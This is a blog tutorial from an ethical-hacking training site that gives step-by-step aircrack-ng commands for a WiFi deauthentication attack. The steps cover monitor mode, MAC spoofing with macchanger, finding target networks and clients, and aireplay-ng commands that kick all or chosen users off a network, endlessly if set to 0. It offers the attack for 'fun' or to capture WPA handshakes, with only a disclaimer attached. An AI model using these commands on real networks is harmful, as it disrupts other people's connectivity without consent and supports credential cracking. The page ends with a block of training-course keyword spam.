Extreme Hacking
Advanced Ethical Hacking Institute in Pune

 

 

Today im going to be showing you how to deauth a wifi network Yeye Now before we start we need to understand what a deauth attack is. So a deauth attack is an attack that sends a packet to the BSSID, that kicks all people off that network. Whats the point in Deauthing? Well, Fun & Pleasure or to Capture WPA Handshakes & Much More. Btw i’ll be using Kali Linux but you can use whatever you only need the Air Family (Aircrack, Airmon, Airodump etc).

Im Also Not Responsible For Anything You Do, This Is Just For Educational Purposes Only…

Let’s Start!

In the Terminal type this command:

Code:
airmon-ng start <Interface>

This will put our Adapter in Monitor Mode.

Now type this command:

Code:
ifconfig <InterfaceMon> down

This will allow us to spoof our MacAddress

Now to actually Change Our Mac Type this:

Code:
macchanger -r <InterfaceMon>
Code:
macchanger -s <InterfaceMon>

This will change our MacAddress

Now we have got the basic stuff sorted we are gonna scan for some nearby WiFi Networks. If you have an adapter like me you will get alot more signals. If your using the Card in you computer laptop you wont get as much.

So To scan for The Networks type:

Code:
airodump-ng <InterfaceMon>

This will scan for BSSID’s, Channel No’s etc.b

Now Look for your target, you want to note down its BSSID & Channel Number.

Now type:

Code:
airodump-ng --bssid <BSSID> -c <ChannelNumber> <InterfaceMon>

We are going to call that our [b]Focus Terminal. When we Deauth & you start seeing Clients (Stations) disappear you know your deauth attack is successful.[/b]

Now its Time to Launch Our Attack….

But First you need to decide if you want to deauth every Client or just one.

If you wanna Deauth whole router:

Code:
aireplay-ng --deauth <Packets> -a <BSSID> <InterfaceMon>

If you wanna Deauth a Client:

Code:
aireplay-ng --deauth <Packets> -a <BSSID> -c <ClientMac> <InterfaceMon>

If you want to deauth your target infinite times put 0 in the Packets section.

FAQ:
Q. How do I find my Interface?
A. Type In the Terminal : airmon-ng.

Q. My Deauth doesnt Work 🙁
A. Wait a few minutes for the attack to go through or add this before your interface when deauthing: –ignore-negative-one

Q. How do i find the people on there?
A. On our Focus Terminal, Look at the station section, if there are Macs under the station section there’s people on the network. Thats the Mac you will be using if your deauthing a client.

www.extremehacking.org
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India,IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune